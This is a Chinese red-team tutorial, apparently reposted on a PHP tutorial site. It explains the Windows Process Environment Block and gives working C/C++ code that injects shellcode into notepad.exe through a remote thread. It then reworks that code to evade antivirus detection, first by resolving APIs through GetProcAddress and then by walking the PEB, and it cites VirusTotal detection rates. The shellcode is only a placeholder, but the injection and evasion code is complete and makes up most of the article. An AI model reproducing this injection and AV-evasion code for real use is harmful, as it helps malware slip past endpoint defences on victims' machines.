讲师中心 微信公众号
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 人工智能 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 人工智能 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机游戏
最近更新
当前位置:首页 > 系统教程 > Windows系列 >

正文

0

0

RedTeamTips--PEB隐藏

雪夜

雪夜

发布时间:2025-09-05 08:10:33

|

520人浏览过

|

来源于php中文网

原创

首先向各位师傅拜个早年,春节将至,公众号将暂停更新一段时间,年后再见。在本文中,我们将探讨如何隐藏程序中的peb信息。首先,让我们了解一下什么是peb,它的全称为process environment block,即进程环境信息块,用于存储进程信息,每个进程都有自己的peb信息,位于用户地址空间。其结构如下:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

具体结构可以参考下图:

RedTeamTips--PEB隐藏

windbg中,可以使用以下命令查看:

!peb

RedTeamTips--PEB隐藏

接下来,我们将介绍如何简单地隐藏PEB信息。首先,我们通过一个简单的远程线程注入示例来展示。

#include
#include
#include
int find_process(const wchar_t* process_name) {
  PROCESSENTRY32 entry;
  entry.dwSize = sizeof(PROCESSENTRY32);
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  int returnValue = 0;
  if (!Process32First(snapshot, &entry)) {
    goto cleanup;
  }
  do {
    if (wcscmp(entry.szExeFile, process_name) == 0) {
      returnValue = entry.th32ProcessID;
      goto cleanup;
    }
  } while (Process32Next(snapshot, &entry));
cleanup:
  CloseHandle(snapshot);
  return returnValue;
}
unsigned char shellcode[] ="\x00";
int main(int argc, char* argv[]){
    HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
    LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
    DWORD ignored;
    CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
    return EXIT_SUCCESS;
}

其API调用链主要有以下两条:

查找进程PID:

CreateToolhelp32Snapshot --> Process32First --> Process32Next

创建线程:

OpenProcess --> VirtualAllocEx --> WriteProcessMemory --> CreateRemoteThread

这些API调用通常是敏感操作,容易被监控。

RedTeamTips--PEB隐藏

VT上也有类似的功能:

RedTeamTips--PEB隐藏

查杀率:

RedTeamTips--PEB隐藏

解决方法1:使用GetProcAddress

GetProcAddress函数用于获取指定动态链接库(DLL)中的输出库函数地址。这种技术在重明中也有使用。

函数原型:

FARPROC GetProcAddress(
   HMODULE hModule,     // DLL模块句柄
   LPCSTR lpProcName    // 函数名);

以CreateToolhelp32Snapshot为例,改用GetProcAddress的调用方法如下:

HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");

以此类推,最终代码如下:

jQuery右侧隐藏收缩在线客服
jQuery右侧隐藏收缩在线客服

jQuery右侧隐藏收缩在线客服是一款默认隐藏悬浮在右侧,鼠标经过滑出的jQuery在线客服代码。

下载 
#include
#include
#include
using namespace std;
unsigned char shellcode[] ="\x00";
HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
int find_process(const wchar_t* process_name) {
  using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
  CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");
  using Process32Firsts = BOOL(WINAPI*)(HANDLE,LPPROCESSENTRY32);
  Process32Firsts Process32First = (Process32Firsts)GetProcAddress(Kernels32,"Process32First");
  using Process32Nexts = Process32Firsts;
  Process32Nexts Process32Next = (Process32Nexts)GetProcAddress(Kernels32,"Process32Next");
  PROCESSENTRY32 entry;
  entry.dwSize = sizeof(PROCESSENTRY32);
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  int returnValue = 0;
  if (!Process32First(snapshot, &entry)) {
    goto cleanup;
  }
  do {
    if (wcscmp(entry.szExeFile, process_name) == 0) {
      returnValue = entry.th32ProcessID;
      goto cleanup;
    }
  } while (Process32Next(snapshot, &entry));
cleanup:
  CloseHandle(snapshot);
  return returnValue;
}
int main(int argc, char* argv[]){
    using OpenProcessPrototype = HANDLE(WINAPI*)(DWORD, BOOL, DWORD);
    OpenProcessPrototype OpenProcess = (OpenProcessPrototype)GetProcAddress(Kernels32, "OpenProcess");
    using VirtualAllocExPrototype = LPVOID(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
    VirtualAllocExPrototype VirtualAllocEx = (VirtualAllocExPrototype)GetProcAddress(Kernels32, "VirtualAllocEx");
    using WriteProcessMemoryPrototype = BOOL(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
    WriteProcessMemoryPrototype WriteProcessMemory = (WriteProcessMemoryPrototype)GetProcAddress(Kernels32, "WriteProcessMemory");
    using CreateRemoteThreadPrototype = HANDLE(WINAPI*)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
    CreateRemoteThreadPrototype CreateRemoteThread = (CreateRemoteThreadPrototype)GetProcAddress(Kernels32, "CreateRemoteThread");
    HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
    LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
    DWORD ignored;
    CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
    return EXIT_SUCCESS;
}

函数情况:

RedTeamTips--PEB隐藏

在不考虑shellcode的情况下,免杀效果:

RedTeamTips--PEB隐藏

解决方法2:从PEB下手

由于PEB是内存中的一个结构,其中包含DLL及其在内存中的位置,我们的思路如下:

遍历PEB,然后从中找到kernel32的地址。找到后,遍历其导出表找到我们需要的函数名称。

其查找地址的方法可以参考以下代码:

#include 
#include 
// Thread Environment Block (TEB)
#if defined(_M_X64) // x64
PTEB tebPtr = reinterpret_cast(__readgsqword(reinterpret_cast(&static_cast(nullptr)->Self)));
#else // x86
PTEB tebPtr = reinterpret_cast(__readfsdword(reinterpret_cast(&static_cast(nullptr)->Self)));
#endif
// Process Environment Block (PEB)
PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;

最终效果如下:

RedTeamTips--PEB隐藏

此时我们可以使用上述方法继续操作,最终结果:

RedTeamTips--PEB隐藏

注:该方法作者已使用很长时间,效果不错,重明工具中也有相关利用,文章截图皆为最新测试截图,该方法无法清除程序中的字符,如有需要可自行更改。

参考文章:

https://www.php.cn/link/9c26f743a1c2d7d8a27fb9e8d366d365

https://www.php.cn/link/f4401dd087608e344ac946c2f5a982e4

https://www.php.cn/link/5d130e4cef1c50de7e168837012989b0

https://www.php.cn/link/d7ce4c420a30736d81b6a9fde18fc13c

相关文章

Win11怎么设置默认浏览器 Win11修改默认浏览器操作步骤【教程】

Win11怎么设置默认浏览器不弹窗_Windows11设置应用默认值Edge

Win11怎么换默认浏览器 Win11改默认应用法【操作】

Win11怎么设置默认浏览器 Windows11更改默认浏览器教程

win7永久激活cmd命令是什么?Win7 CMD命令行永久激活详解

相关标签:

word go windows cad app access 工具 ai ios win 解决方法 using 线程 windows https microsoft

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

上一篇:Win10无法删除文件夹进程怎么办?Win10无法删除文件夹进程的解决 下一篇:Win10无法快速启动0xC000007B怎么办

作者最新文章

iphone色弱怎么调_iphone为色弱用户调整显示模式教程【方法】

2026-01-26 08:12

次元姬轻小说无弹窗阅读网-次元姬小说全本免费在线看

2026-01-26 08:21

方正电脑怎样恢复出厂设置_方正电脑恢复出厂设置光盘引导法【指南】

2026-01-26 08:30

金山文档空白页因嵌入字体咋删_金山文档删嵌入字体空白页【技巧】

2026-01-26 08:36

职业小知识最新答案1.25 蚂蚁新村职业小知识今日答案1.25

2026-01-26 08:45

如何去除衣服上的油渍_衣服去油渍实用技巧【妙招】

2026-01-26 08:45

html5布局代码媒体查询断点设_html5布局代码断点设置法【步骤】

2026-01-26 09:10

php创建文件大小能预设吗_php预配空间创文件法【步骤】

2026-01-26 09:20

Win11怎么设置自动关机_Win11自动关机设置方法【步骤】

2026-01-26 09:35

电脑安装软件被杀毒拦_电脑关闭杀毒拦截设置【方案】

2026-01-26 09:38

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

AI 编程开发AI 聊天问答
豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

AI 编程开发AI大模型
通义千问
通义千问

阿里巴巴推出的全能AI助手

AI 编程开发Agent智能体
腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文档处理AI 聊天问答
文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

AI 编程开发AI 文本写作
讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

AI 文本写作中文写作
即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

图片拼接图画生成
ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI 编程开发AI 文本写作
智谱清言 - 免费全能的AI助手
智谱清言 - 免费全能的AI助手

智谱清言 - 免费全能的AI助手

AI 编程开发Agent智能体

相关专题

更多
线程和进程的区别
线程和进程的区别

线程和进程的区别:线程是进程的一部分,用于实现并发和并行操作,而线程共享进程的资源,通信更方便快捷,切换开销较小。本专题为大家提供线程和进程区别相关的各种文章、以及下载和课程。

502

2023.08.10

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

761

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1128

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

799

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

454

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2354

2023.08.08

windows自动更新
windows自动更新

Windows操作系统的自动更新功能可以确保系统及时获取最新的补丁和安全更新,以提高系统的稳定性和安全性。然而,有时候我们可能希望暂时或永久地关闭Windows的自动更新功能。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

823

2023.08.10

windows boot manager
windows boot manager

windows boot manager无法开机的解决方法:1、系统文件损坏,使用Windows安装光盘或USB启动盘进入恢复环境,选择修复计算机,然后选择自动修复;2、引导顺序错误,进入恢复环境,选择命令提示符,输入命令"bootrec /fixboot"和"bootrec /fixmbr",然后重新启动计算机;3、硬件问题,使用硬盘检测工具进行扫描和修复;4、重装操作系统。本专题还提供其他解决

1626

2023.08.28

俄罗斯Yandex引擎入口
俄罗斯Yandex引擎入口

2026年俄罗斯Yandex搜索引擎最新入口汇总,涵盖免登录、多语言支持、无广告视频播放及本地化服务等核心功能。阅读专题下面的文章了解更多详细内容。

31

2026.01.28

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

相关下载

更多
jQuery淡入淡出多级下拉动画菜单
jQuery全屏相册插件zoomVisualizer
炫酷jQuery可拖拽放大镜动画
JS网页顶部智能固定导航代码
HTML5多功能粘性页脚导航菜单特效
jQuery浮动广告横幅代码
jQuery右侧隐藏收缩在线客服

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
CSS3 教程
CSS3 教程

共18课时 | 4.9万人学习

JavaScript ES5基础线上课程教学
JavaScript ES5基础线上课程教学

共6课时 | 11.2万人学习

手把手教你通过宝塔搭建网站服务器
手把手教你通过宝塔搭建网站服务器

共1课时 | 925人学习

最新文章

更多
Win11怎么设置开机自动登录 Win11免密码自动进入桌面【便捷】
windows注册表开机启动项怎么设置?自启动程序注册表添加删除详解
Win11怎么开启讲述人 Win11盲人辅助功能开启【辅助】
Win11电脑闹钟同步手机吗_同步设置教程【说明】
Win11怎么设游戏勿扰闹钟_Win11勿扰闹钟法【指南】
Win11怎么关闭触屏手势 Win11边缘滑动手势禁用【操作】
Win11怎么查看CPU代数 Win11处理器具体型号解读【科普】
Win11怎么开启自动字幕 Win11系统级实时字幕使用【辅助】
Win11怎样开启专注助手_Win11开启专注助手步骤【步骤】
Win11怎么关闭系统保护 Win11删除还原点释放空间【清理】
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部